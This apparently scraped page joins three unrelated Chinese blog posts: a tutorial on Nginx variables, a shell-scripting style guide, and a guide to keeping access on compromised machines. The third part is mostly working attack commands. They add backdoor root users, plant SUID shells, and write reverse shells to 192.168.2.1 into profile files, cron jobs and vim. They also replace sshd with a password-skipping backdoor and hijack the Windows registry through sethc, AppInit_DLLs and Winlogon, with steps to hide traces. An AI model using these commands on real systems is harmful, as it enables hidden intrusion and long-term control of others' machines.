之前說了很多關於 Nginx 模塊的內容，還有一部分非常重要的內容，那就是 Nginx 的變量。變量在 Nginx 中可以說無處不在，認識了解這些變量的作用和原理同樣是必要的，下面幾乎囊括了關於 Nginx 的所有變量，單獨看起來可能比較枯燥，放心，後面依然有實戰內容。

Nginx 變量的運行原理

圍繞 Nginx 中的變量模塊可以分為兩類，一類是提供變量的模塊，另外一類是使用變量的模塊。

• 提供變量的模塊
  • 在 Preconfiguration 源代碼中定義變量名以及可以解析出變量的方法
• 使用變量的模塊
  • 解析 nginx.conf 時定義變量的使用方式

也就是在 Nginx 啟動時，已經定義了變量，而只有當真正處理請求的時候，才會根據 nginx.conf 解析出來的變量使用方式調用 Preconfiguration 中定義的方法來實際獲取值。

這也是變量的兩個特性：

• 惰性求值：只有使用的時候才會去調方法解析
• 變量值可以時刻變化，其值為使用的那一時刻的值。例如發送響應包體字節數，實際在發送的過程中是一直在變化的。

除了 Nginx 的模塊之外，Nginx 框架也包含許多的變量，這些變量不需要通過編譯模塊來引入，而且，Nginx 框架所提供的變量往往反映了處理請求的細節，因此，了解 Nginx 框架所提供的變量是十分有必要的。

HTTP 請求相關的變量

先來看一下關於 HTTP 請求的相關變量。

• arg_參數名：URL 中某個具體參數的值

• query_string：與 args 變量完全相同

• args：全部 URL 參數

• is_args：如果請求 URL 中有參數則返回 ?，否則返回空

• content_length：HTTP 請求中標識包體長度的 Content-Length 頭部的值。如果請求中沒有攜帶這個參數，那麼就取不到對應的值。

• content_type：標識請求包體類型的 Content-Type 頭部的值。同樣需要用戶請求中攜帶對應的參數。

• uri：請求的 URI（不同於 URL，不包括 ? 后的參數）

• document_uri：與 uri 完全相同。由於歷史原因而存在的。

• request_uri：請求的 URL（包括 URI 以及完整的參數）

• scheme：協議名，例如 HTTP 或者 HTTPS

• request_method：請求方法，例如 GET 或者 POST

• request_length：所有請求內容的大小，包括請求行、頭部、包體等

• remote_user：由 HTTP Basic Authentication 協議傳入的用戶名

• request_body_file：很多時候會將用戶請求的包體存放到文件中，這個變量就是臨時存放請求包體的文件

  • 如果包體非常小則不會存文件
  • client_body_in_file_only 指令強制所有包體存入文件，且可決定是否刪除

• request_body：請求中的包體，這個變量當且僅當使用反向代理，且設定用內存暫存包體時才有效

• request：原始的 URL 請求，含有方法與協議版本，例如 GET /?a=1&b=22 HTTP/1.1

• host

  • 先從請求行中獲取
  • 如果含有 Host 頭部，則用其值替換掉請求行中的主機名
  • 如果前兩者都取不到，則使用匹配上的 server_name

• http_頭部名字：返回一個具體請求頭部的值

  特殊變量，這些變量會做一些處理。

  • http_host
  • http_user_agent
  • http_referer
  • http_via
  • http_x_forwarded_for
  • http_cookie

  通用變量，除了以上的變量，都可以取到對應的值。

TCP 連接相關的變量

下面是關於 TCP 連接的變量。

• binary_remote_addr：客戶端地址的整形格式，對於 IPv4 是 4 字節，對於 IPv6 是 16 字節，所以在 limit_req 和 limit_conn 中通常可以用作 key （詳見：Nginx 處理 HTTP 請求的 11 個階段 中的 preaccess 階段）
• connection：遞增的連接序號
• connection_requests：當前連接上執行過的請求數，對 keepalive 連接有意義
• remote_addr：客戶端地址
• remote_port：客戶端端口
• proxy_protocol_addr：若使用了 proxy_protocol 協議，則返回協議中的地址，否則返回空
• proxy_protocol_port：若使用了 proxy_protocol 協議則返回協議中的端口，否則返回空
• server_addr：服務端地址
• server_port：服務器端端口
• TCP_INFO：TCP 內核層參數，包括 $tcpinfo_rtt, ​$tcpinfo_rttvar,​$tcpinfo_snd_cwnd, $tcpinfo_rcv_space
• server_protocol：服務器端協議，例如 HTTP/1.1

Nginx 處理請求過程中產生的變量

Nginx 處理 HTTP 請求的過程中也會產生很多變量。

• request_time：請求處理到現在的耗時，單位為秒，精確到毫秒
• server_name：匹配上請求的 server_name 值
• https：如果開啟了 TLS/SSL 則返回 on，否則返回空
• request_completion：若請求處理完則返回 OK，否則返回空
• request_id：以 16 進制輸出的請求表示 id，該 id 共含有 16 個字節，是隨機生成的
• request_filename：待訪問文件的完整路徑
• document_root：由 URI 和 root、alias 規則生成的文件夾路徑
• realpath_root：將 document_root 中的軟鏈接等換成真實路徑
• limit_rate：返回客戶端響應時的速度上限，單位為每秒字節數。可以通過 set 指令修改對請求產生的效果

發送 HTTP 響應時相關的變量

• body_bytes_sent：響應中 body 包體的長度

• bytes_sent：全部 http 響應的長度

• status：http 響應中的返回碼

• sent_trailer_名字：把響應結尾內容里的值返回

• sent_http_頭部名字：響應中某個具體頭部的值

  特殊處理，下面這些變量需要經過特殊處理：

  • sent_http_content_type
  • sent_http_content_length
  • sent_http_location
  • sent_http_last_modified
  • sent_http_connection
  • sent_http_keep_alive
  • sent_http_transfer_encoding
  • sent_http_cache_control
  • sent_http_link

  通用：除了上面這些頭部，其他的頭部都是通用型的，也就是可以直接拿來用。

Nginx 系統變量

• time_local：以本地時間標準輸出的當前時間，例如 14/Nov/2018:15:55:37 +0800
• time_iso8601：使用 ISO8601 標準輸出的當前時間，例如 2018-11-14T15:55:37+08:00
• nginx_version：Nginx 版本號
• pid：所屬 worker 進程的進程 id
• pipe：使用了管道則返回 p，否則返回 .
• hostname：所在服務器的主機名，與 hostname 命令輸出一致
• msec：1970 年 1 月 1 日到現在的時間，單位為秒，小數點后精確到毫秒

實戰

配置文件：

log_format  vartest  '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status bytes_sent=$bytes_sent body_bytes_sent=$body_bytes_sent "$http_referer" '
                      '"$http_user_agent" "$sent_http_abc"';

server {
	server_name var.ziyang.com localhost;
	#error_log logs/myerror.log debug;
	access_log logs/vartest.log vartest;
	listen 9090;
	
	location / {
		set $limit_rate 10k;
        # return 200; tcpinfo: $tcpinfo_rtt,$tcpinfo_rttvar, $tcpinfo_snd_cwnd, $tcpinfo_rcv_space 
		return 200 '
arg_a: $arg_a,arg_b: $arg_b,args: $args
connection: $connection,connection_requests: $connection_requests
cookie_a: $cookie_a
uri: $uri,document_uri: $document_uri, request_uri: $request_uri
request: $request
request_id: $request_id
server: $server_addr,$server_name,$server_port,$server_protocol
            
host: $host,server_name: $server_name,http_host: $http_host
limit_rate: $limit_rate
hostname: $hostname
content_length: $content_length
status: $status
body_bytes_sent: $body_bytes_sent,bytes_sent: $bytes_sent
time: $request_time,$msec,$time_iso8601,$time_local
';
	}	
}

從上面這個配置文件中，我們可以看出來，返回的響應裡面包含了一系列的變量，實際驗證一下：

  test_nginx curl -H 'Content-Length: 0' -H 'Cookie: a=c1' 'localhost:9090?a=1&b=22'

arg_a: 1,arg_b: 22,args: a=1&b=22
connection: 2,connection_requests: 1
cookie_a: c1
uri: /,document_uri: /, request_uri: /?a=1&b=22
request: GET /?a=1&b=22 HTTP/1.1
request_id: 5d40b1ff29d2b87d5db5c4f95ebf5e4d
server: 127.0.0.1,var.ziyang.com,9090,HTTP/1.1
host: localhost,server_name: var.ziyang.com,http_host: localhost:9090
limit_rate: 10240
hostname: yuanzizhen.local
content_length: 0
status: 200
body_bytes_sent: 0,bytes_sent: 0
time: 0.000,1590842354.866,2020-05-30T20:39:14+08:00,30/May/2020:20:39:14 +0800

大家可以對比一下響應和配置文件中的值是不是一一對應的，更加深刻的理解一下變量的含義。

好了，這一節咱們學習了。關於 Nginx 的變量就講完了，下一節講一下實際應用變量的兩個模塊，大家會有更深刻的理解。

本文首發於我的個人博客：iziyang.github.io，所有配置文件我已經放在了 Nginx 配置文件，大家可以自取。

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

※南投搬家公司費用,距離,噸數怎麼算?達人教你簡易估價知識!

※教你寫出一流的銷售文案?

※超省錢租車方案

• ver：1.0
• 博客：https://www.cnblogs.com/Rohn
• 本文介紹了Shell編程的一些語法規範，主要參考依據為谷歌的Shell語法風格。

目錄

• 背景
  • 使用哪一種Shell
  • 什麼時候使用Shell
• 註釋
  • 頂層註釋
  • 功能註釋
  • TODO註釋
• 格式
  • 縮進
  • 行的長度和長字符串
  • 管道
  • 循環
    • if-else語句
    • for-do和while-do語句
  • case語句
  • 變量擴展
• 特性
  • 命令替換
  • 文件名的通配符擴展
• 命名約定
  • 函數名
  • 變量名
  • 常量和環境變量名
  • 源文件名
  • 只讀變量
  • 使用本地變量
• 調用命令
  • 檢查返回值

背景

博客：https://www.cnblogs.com/Rohn

使用哪一種Shell

可執行文件必須以 #!/bin/bash 和最小數量的標誌開始。請使用 set 來設置shell的選項，使得用 <script_name>調用你的腳本時不會破壞其功能。

推薦使用：

#!/usr/bin/env bash

env一般固定在/usr/bin目錄下，而其餘解釋器的安裝位置就相對不那麼固定。

限制所有的可執行Shell腳本為bash使得我們安裝在所有計算機中的shell語言保持一致性。

無論你是為什麼而編碼，對此唯一例外的是當你被迫時可以不這麼做的。其中一個例子是Solaris SVR4包，編寫任何腳本都需要用純Bourne shell。

[root@test ~]# echo $SHELL
/bin/bash

什麼時候使用Shell

使用Shell需要遵守的一些準則：

• 如果你主要是在調用其他的工具並且做一些相對很小數據量的操作，那麼使用Shell來完成任務是一種可接受的選擇。
• 如果你在乎性能，那麼請選擇其他工具，而不是使用Shell。
• 如果你發現你需要使用數據而不是變量賦值（如 ${PHPESTATUS} ），那麼你應該使用Python腳本。
• 如果你將要編寫的腳本會超過100行，那麼你可能應該使用Python來編寫，而不是Shell。

請記住，當腳本行數增加，儘早使用另外一種語言重寫你的腳本，以避免之後花更多的時間來重寫。

註釋

博客：https://www.cnblogs.com/Rohn

Bash只支持單行註釋，使用#開頭的都被當作註釋語句。

頂層註釋

每個文件必須包含一個頂層註釋，對其內容進行簡要概述。版權聲明和作者信息是可選的。
例如：

#!/usr/bin/env bash
# Author: Rohn
# Version: 1.0
# Created Time: 2020/06/06
# Perform hot backups of MySQL databases.

• 第1行，指明解釋器，使用bash

#!叫做”Shebang”或者”Sha-bang”(Unix術語中，#號通常稱為sharp，hash或mesh；而!則常常稱為bang)，指明了執行這個腳本文件的解釋程序。當然，如果使用bash test.sh這樣的命令來執行腳本，那麼#!這一行將會被忽略掉。

• 第2-5行，分別為作者、版本號、創建時間、功能說明。

功能註釋

任何不是既明顯又短的函數都必須被註釋。任何庫函數無論其長短和複雜性都必須被註釋。

其他人通過閱讀註釋（和幫助信息，如果有的話）就能夠學會如何使用你的程序或庫函數，而不需要閱讀代碼。

所有的函數註釋應該包含：

• 函數的描述
• 全局變量的使用和修改
• 使用的參數說明
• 返回值，而不是上一條命令運行后默認的退出狀態

例如：

#!/usr/bin/env bash
# Author: Rohn
# Version: 1.0
# Created Time: 2020/06/06
# Perform hot backups of Oracle databases.

export PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin'

#######################################
# Cleanup files from the backup dir
# Globals:
#   BACKUP_DIR
#   ORACLE_SID
# Arguments:
#   None
# Returns:
#   None
#######################################
cleanup() {
  ...
}

TODO註釋

TODOs應該包含全部大寫的字符串TODO，接着是括號中你的用戶名。冒號是可選的。最好在TODO條目之後加上bug或者ticket的序號。

例如：

# TODO(mrmonkey): Handle the unlikely edge cases (bug ####)

格式

博客：https://www.cnblogs.com/Rohn

縮進

縮進兩個空格，沒有製表符。例如：

if [ a > 1 ];then
  echo '${a} > 1'
fi

行的長度和長字符串

行的最大長度為80個字符。例如：

# DO use 'here document's
cat <<END;
I am an exceptionally long
string.
END

# Embedded newlines are ok too
long_string="I am an exceptionally
  long string."

管道

如果一行容不下整個管道操作，那麼請將整個管道操作分割成每行一個管段。

應該將整個管道操作分割成每行一個管段，管道操作的下一部分應該將管道符放在新行並且縮進2個空格。這適用於使用管道符|的合併命令鏈以及使用||和&&的邏輯運算鏈。

例如：

# All fits on one line
command1 | command2

# Long commands
command1 \
  | command2 \
  | command3 \
  | command4

循環

if-else語句

if和; then放在同一行，;后空一格，else單獨一行，fi單獨一行，並與if垂直對齊。即：

if condition; then
  statement(s)
else
  statement(s)
fi

for-do和while-do語句

while/for和; do放在同一行，done與while/for垂直對齊，即：

# while structure
while condition; do
  statement(s)
done

# for structure
for condition; do
  statement(s)
done

例如：

for dir in ${dirs_to_cleanup}; do
  if [[ -d "${dir}/${ORACLE_SID}" ]]; then
    log_date "Cleaning up old files in ${dir}/${ORACLE_SID}"
    rm "${dir}/${ORACLE_SID}/"*
    if [[ "$?" -ne 0 ]]; then
      error_message
    fi
  else
    mkdir -p "${dir}/${ORACLE_SID}"
    if [[ "$?" -ne 0 ]]; then
      error_message
    fi
  fi
done

case語句

• 通過2個空格縮進可選項。
• 在同一行可選項的模式右圓括號之後和結束符 ;;之前各需要一個空格。
• 長可選項或者多命令可選項應該被拆分成多行，模式、操作和結束符;;在不同的行。

匹配表達式比case和esac 縮進一級。多行操作要再縮進一級。一般情況下，不需要引用匹配表達式。模式表達式前面不應該出現左括號。避免使用;&和;;&符號。即：

# case structure
case in expression in
  pattern1)
    statement1
    ;;
  pattern2)
    statement2
    ;;
  ...
  *)
    statementn
    ;;
esac

例如：

case "${expression}" in
  a)
    variable="..."
    some_command "${variable}" "${other_expr}" ...
    ;;
  absolute)
    actions="relative"
    another_command "${actions}" "${other_expr}" ...
    ;;
  *)
    error "Unexpected expression '${expression}'"
    ;;
esac

只要整個表達式可讀，簡單的命令可以跟模式和;; 寫在同一行。這通常適用於單字母選項的處理。當單行容不下操作時，請將模式單獨放一行，然後是操作，最後結束符;; 也單獨一行。當操作在同一行時，模式的右括號之後和結束符;;之前請使用一個空格分隔。

verbose='false'
aflag=''
bflag=''
files=''
while getopts 'abf:v' flag; do
  case "${flag}" in
    a) aflag='true' ;;
    b) bflag='true' ;;
    f) files="${OPTARG}" ;;
    v) verbose='true' ;;
    *) error "Unexpected option ${flag}" ;;
  esac
done

變量擴展

按優先級順序：保持跟你所發現的一致；引用你的變量；推薦用${var}而不是$var 。

例如

# Section of recommended cases.

# Preferred style for 'special' variables:
echo "Positional: $1" "$5" "$3"
echo "Specials: !=$!, -=$-, _=$_. ?=$?, #=$# *=$* @=$@ \$=$$ ..."

# Braces necessary:
echo "many parameters: ${10}"

# Braces avoiding confusion:
# Output is "a0b0c0"
set -- a b c
echo "${1}0${2}0${3}0"

# Preferred style for other variables:
echo "PATH=${PATH}, PWD=${PWD}, mine=${some_var}"
while read f; do
  echo "file=${f}"
done < <(ls -l /tmp)

# Section of discouraged cases

# Unquoted vars, unbraced vars, brace-quoted single letter
# shell specials.
echo a=$avar "b=$bvar" "PID=${$}" "${1}"

# Confusing use: this is expanded as "${1}0${2}0${3}0",
# not "${10}${20}${30}
set -- a b c
echo "$10$20$30"

特性

博客：https://www.cnblogs.com/Rohn

命令替換

使用 $(command)而不是反引號。

嵌套的反引號要求用反斜杠轉義內部的反引號。而$(command) 形式嵌套時不需要改變，而且更易於閱讀。

例如：

# This is preferred:
var="$(command "$(command1)")"

# This is not:
var="`command \`command1\``"

文件名的通配符擴展

當進行文件名的通配符擴展時，請使用明確的路徑。

因為文件名可能以-開頭，所以使用擴展通配符./*比*來得安全得多。

# Here's the contents of the directory:
# -f  -r  somedir  somefile

# This deletes almost everything in the directory by force
psa@bilby$ rm -v *
removed directory: `somedir'
removed `somefile'

# As opposed to:
psa@bilby$ rm -v ./*
removed `./-f'
removed `./-r'
rm: cannot remove `./somedir': Is a directory
removed `./somefile'

命名約定

博客：https://www.cnblogs.com/Rohn

函數名

使用小寫字母，並用下劃線分隔單詞。使用雙冒號 :: 分隔庫。函數名之後必須有圓括號。關鍵詞 function 是可選的，但必須在一個項目中保持一致。

如果你正在寫單個函數，請用小寫字母來命名，並用下劃線分隔單詞。如果你正在寫一個包，使用雙冒號 :: 來分隔包名。大括號必須和函數名位於同一行（就像在Google的其他語言一樣），並且函數名和圓括號之間沒有空格。

# Single function
my_func() {
  ...
}

# Part of a package
mypackage::my_func() {
  ...
}

當函數名后存在 () 時，關鍵詞 function 是多餘的。但是其促進了函數的快速辨識。

變量名

使用小寫字母，循環的變量名應該和循環的任何變量同樣命名。例如：

for zone in ${zones}; do
  something_with "${zone}"
done

常量和環境變量名

全部使用大寫字母，用下劃線分隔，聲明在文件的頂部。例如：

# Constant
readonly PATH_TO_FILES='/some/path'

# Both constant and environment
declare -xr ORACLE_SID='PROD'

源文件名

使用小寫字母，如果需要的話使用下劃線分隔單詞。例如： maketemplate 或者 make_template ，而不是 make-template 。

只讀變量

使用小寫字母，使用 readonly 或者 declare -r 來確保變量只讀。

因為全局變量在Shell中廣泛使用，所以在使用它們的過程中捕獲錯誤是很重要的。當你聲明了一個變量，希望其只讀，那麼請明確指出。

zip_version="$(dpkg --status zip | grep Version: | cut -d ' ' -f 2)"
if [[ -z "${zip_version}" ]]; then
  error_message
else
  readonly zip_version
fi

使用本地變量

使用小寫字母，使用 local 聲明特定功能的變量。聲明和賦值應該在不同行。

使用 local 來聲明局部變量以確保其只在函數內部和子函數中可見。這避免了污染全局命名空間和不經意間設置可能具有函數之外重要性的變量。

當賦值的值由命令替換提供時，聲明和賦值必須分開。因為內建的 local 不會從命令替換中傳遞退出碼。

my_func2() {
  local name="$1"

  # Separate lines for declaration and assignment:
  local my_var
  my_var="$(my_func)" || return

  # DO NOT do this: $? contains the exit code of 'local', not my_func
  local my_var="$(my_func)"
  [[ $? -eq 0 ]] || return

  ...
}

調用命令

博客：https://www.cnblogs.com/Rohn

檢查返回值

對於非管道命令，使用$?或直接通過一個if語句來檢查以保持其簡潔。例如：

if ! mv "${file_list}" "${dest_dir}/" ; then
  echo "Unable to move ${file_list} to ${dest_dir}" >&2
  exit "${E_BAD_MOVE}"
fi

# Or
mv "${file_list}" "${dest_dir}/"
if [[ "$?" -ne 0 ]]; then
  echo "Unable to move ${file_list} to ${dest_dir}" >&2
  exit "${E_BAD_MOVE}"
fi

Bash也有 PIPESTATUS 變量，允許檢查從管道所有部分返回的代碼。如果僅僅需要檢查整個管道是成功還是失敗，以下的方法是可以接受的：

tar -cf - ./* | ( cd "${dir}" && tar -xf - )
if [[ "${PIPESTATUS[0]}" -ne 0 || "${PIPESTATUS[1]}" -ne 0 ]]; then
  echo "Unable to tar files to ${dir}" >&2
fi

可是，只要你運行任何其他命令， PIPESTATUS 將會被覆蓋。如果你需要基於管道中發生的錯誤執行不同的操作，那麼你需要在運行命令后立即將 PIPESTATUS 賦值給另一個變量（別忘了 [ 是一個會將 PIPESTATUS 擦除的命令）。

tar -cf - ./* | ( cd "${DIR}" && tar -xf - )
return_codes=(${PIPESTATUS[*]})
if [[ "${return_codes[0]}" -ne 0 ]]; then
  do_something
fi
if [[ "${return_codes[1]}" -ne 0 ]]; then
  do_something_else
fi

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※別再煩惱如何寫文案,掌握八大原則!

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※超省錢租車方案

※教你寫出一流的銷售文案?

※網頁設計最專業,超強功能平台可客製化

※產品缺大量曝光嗎?你需要的是一流包裝設計!

linux權限維持

添加賬號

一般在具有root權限時可以使用以下2種方式添加root權限用戶

1.通過useradd，後面賬號backdoor/123456

useradd -u 0 -o -g root -G root backdoor

echo 123456:password|chpasswd

2.通過直接對etc/passwd文件進行寫入

perl -e 'print crypt("123456", "AA"). "\n"' #首先用perl算一下123456加密后的結果

# 123456加密后的結果為AASwmzPNx.3sg

echo "backdoor:123456:0:0:me:/root:/bin/bash">>/etc/passwd	#直接寫入etc/passwd中

清理以上痕迹

userdel -f backdoor

設置sid位的文件

在具有高權限時，將高權限的bash文件拷貝隱藏起來，設置其suid位，則可後面通過低權限用戶獲取高權限操作

在高權限時

cp /bin/bash /tmp/.bash

chmod 4755 /tmp/.bash  #設置suid

使用時帶上-p參數

/tmp/.bash -p

清理痕迹

rm -rf /tmp/.bash

通過環境變量植入後門

以下是環境變量的位置

/etc/profile
/etc/profile.d/*.sh
~/.bash_profile
~/.profile
~/.bashrc
~/bash_logout
/etc/bashrc
/etc/bash.bashrc

寫入shell反彈語句

echo 'bash -i >& /dev/tcp/192.168.2.1/7777 0>&1' >> /etc/profile

這樣在重啟的時候就會彈shell過來了,會根據登的哪個賬號彈哪個賬號的shell

以下文件需要高權限，為全局變量

/etc/profile
/etc/profile.d/*.sh
/etc/bashrc
/etc/bash.bashrc

以下為當前用戶的環境變量

~/.bash_profile		#實驗過程中沒有反應
~/.profile				#登錄後會接收shell，但是加載桌面時會卡住
~/.bashrc					#打開shell窗口時會接收shell，但正常的shell窗口會卡住
~/bash_logout			#實驗過程中沒有反應

清理痕迹

刪除配置文件中添加的代碼即可

寫入ssh公鑰

首先在本地生成ssh公鑰和私鑰

在自己的~/.ssh/目錄下執行

ssh-keygen -t rsa

會生成以下三個文件，id_rsa.pub為公鑰，id_rsa為私鑰

id_rsa      id_rsa.pub  known_hosts

xxx為公鑰內容，也就是id_rsa.pub的內容

echo "xxx" >> ~/.ssh/authorized_keys

清理痕迹

刪除目標上的 ~/.ssh/authorized_keys即可

ssh任意密碼登錄

在root用戶時，su，chfn，chsh命令不需要輸入密碼認證

通過軟連接將ssh的服務進行cp，並重命名為以上命令

ln -sf /usr/sbin/sshd /tmp/su				#將sshd做軟連接，軟連接文件名為su或chfn或chsh
/tmp/su -oPort=12345								#通過軟連接的文件，開啟ssh連接-oPort指定開啟端口

連接

ssh root@host -p 12345

#密碼隨便輸入即可登錄,並且可登錄任意賬號

清理方式

netstat -antp | gerp -E "su|chfn|chsh"
#找到進程號xxx
ps aux | grep xxx
#找到軟連接位置/aaa/bbb/su
kill xxx
rm -rf /aaa/bbb/su

修改sshd文件做到無認證登錄

建立連接時ssh服務器端使用的是sshd文件來管理接收到的連接，此時對sshd文件內容進行修改，則能做到無認證登錄

將原先的sshd文件進行轉義

mv /usr/sbin/sshd /usr/bin/sshd

開始使用perl進行寫腳本

echo '#!/usr/bin/perl' > /usr/sbin/sshd
echo 'exec "/bin/bash -i" if (getpeername(STDIN) =~ /^..LF/);' >> /usr/sbin/sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >> /usr/sbin/sshd

其實整個腳本在第二行執行了個if，如果端口符合要求，則直接建立連接，否則正常執行sshd

其中的LF代表開啟的端口號是19526

python2
>> import struct
>> print struct.pack('>I6',19526) 
#輸出的內容為 LF

賦予新文件權限並重啟sshd

chmod u+x sshd
service sshd restart

連接方式

socat STDIO TCP4:172.16.177.178:22,bind=:19526

清除痕迹

#刪除自定義的sshd
rm -rf /usr/sbin/sshd
#將同版本的sshd拷貝到對應目錄下
mv /usr/bin/sshd /usr/sbin/sshd

利用vim可執行python腳本預留後門

先準備個python的反彈shell腳本

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.1",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

找到提供vim插件的python的擴展包目錄

vim --version  #查看使用的python版本

找到python的擴展位置

pip show requests

進入目錄

cd /usr/lib/python2.7/site-packages

將內容寫入

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.1",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > dir.py

運行，並刪除文件

$(nohup vim -E -c "pyfile dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

清除痕迹

ps aux|grep vim
#獲取pid
kill pid

計劃任務

因為計劃任務使用的是/bin/sh,所以傳統的直接通過bash反彈shell是行不通的

這裏藉助python，或者perl都可

使用python

echo -e "*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.1\",7778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"|crontab -

使用perl

echo -e "*/1 * * * * perl -e 'use Socket;\$i=\"192.168.2.1\";\$p=7778;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"|crontab -

清除痕迹

如果通過crontab -e 不知道為啥會頂掉上一個

crontab -l			#只看得到一個
crontab -r			#刪除所有計劃任務

動態加載庫

使用export LD_PRELOAD=./xx.so

這時候./xx.so中如果對函數進行了重定義，調用了該函數的程序就會執行重定義的代碼

這裏使用以下項目

https://github.com/Screetsec/Vegile

準備2個文件

• msf的木馬
• Veglie項目

使用方法將MSF木馬和Vegile上傳到目標服務器上，把項目目錄弄成http服務

python -m SimpleHTTP

目標服務器上

wget http://xxx.xxx.xx.xxx:8000/Vegile.zip
wget http://xxx.xxx.xx.xxx:8000/shell

解壓后運行

unzip Vegile.zip
chmod 777 Vegile shell
./Vegile --u shell

清理痕迹

清理起來十分麻煩，因為直接刪除進程是刪不掉的，因此存在父進程與多個子進程

清理思路掛起父進程，清除所有子進程再刪除父進程

windows權限維持

比較常見的windows提取

ms14_058 內核模式驅動程序中的漏洞可能允許遠程執行代碼
ms16_016 WebDAV本地提權漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提權漏漏洞

計劃任務

拿到shell后先修改編碼

chcp 65001

設置計劃任務，每分鐘調用運行一次shell

schtasks /create /tn shell /tr C:\payload.exe /sc minute /mo 1 /st 10:30:30 /et 10:50:00

清理痕迹

控制面板->管理工具->任務計劃程序->找到惡意計劃任務
在 操作 中找到調用的腳本，進行文件刪除
刪除惡意計劃任務

映像劫持

在程序運行前會去讀自己是否設置了debug，需要對劫持的程序有權限

以下通過註冊表對setch.exe設置了debug為cmd.exe程序，也就是按5下shift會彈出cmd的框

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

清理痕迹

HKLM是HKEY_LOCAL_MACHINE

找到目標的註冊表，將debug內容刪除

環境變量

用戶登陸時會去加載環境變量，通過設置環境變量UserInitMprLogonScript值，實現登陸時自動運行腳本

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Users\Public\Downloads\1.bat" /f

清理痕迹

直接找到 開始->用戶頭像->更改我的環境變量

進程退出劫持

在註冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit下控製程序的退出時執行的動作,但有時候權限很迷

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "c:\payload.exe”

清理痕迹

找到目標的註冊表刪除即可

AppInit_DLLs注入

User32.dll 被加載到進程時，設置其註冊表的中能設置加載其他的dll文件，則可使其加載惡意的腳本

對HKML註冊表的內容進行修改一般都要system權限

Windows 10

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Users\Public\Downloads\beacon.dll" /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f

其他

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Users\Public\Downloads\beacon.dll" /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f

這樣在打開cmd或者計算器這種能調用User32.dll動態鏈接庫的時候就會觸發

清理痕迹

到對應註冊表的位置刪除Appinit_Dlls的值

bits文件傳輸

通過bitsadmin從網絡上下載的時候可以額外執行腳本

bitsadmin /create test

隨意下載
bitsadmin /addfile test http://192.168.2.1:8000/payload.ps1 c:\users\public\downloads\payload.ps1 

執行的命令
bitsadmin /SetNotifyCmdLine test "C:\windows\system32\cmd.exe" "cmd.exe /c c:\users\public\downloads\payload.exe" 

啟動任務
bitsadmin /resume test

每次開機的時候會觸發

清理痕迹

bitsadmin /reset

COM組件劫持

將腳本放入com組件中

reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /t REG_SZ /d "c:\users\public\downloads\beacon.dll" /f

reg add "HKEY_CURRENT_USER\Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f

清理痕迹

刪除註冊表中的路徑值，並通過路徑刪除木馬文件

替換cmd.exe

將sethc.exe（按shift 5下）替換成cmd.exe

takeown /f sethc.* /a /r /d y
cacls sethc.exe /T /E /G administrators:F
copy /y cmd.exe sethc.exe

清理痕迹

找個原版的setch.exe 覆蓋回去

Winlogon劫持

winlogon是windows登錄賬戶時會執行的程序，這裏將其註冊表中寫入木馬運行的dll路徑

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /t REG_SZ /d "explorer.exe, rundll32.exe \"c:\users\public\downloads\beacon.dll\" StartW" /f

清理痕迹

刪除註冊表的shell中的值，並且找到後門文件刪除掉

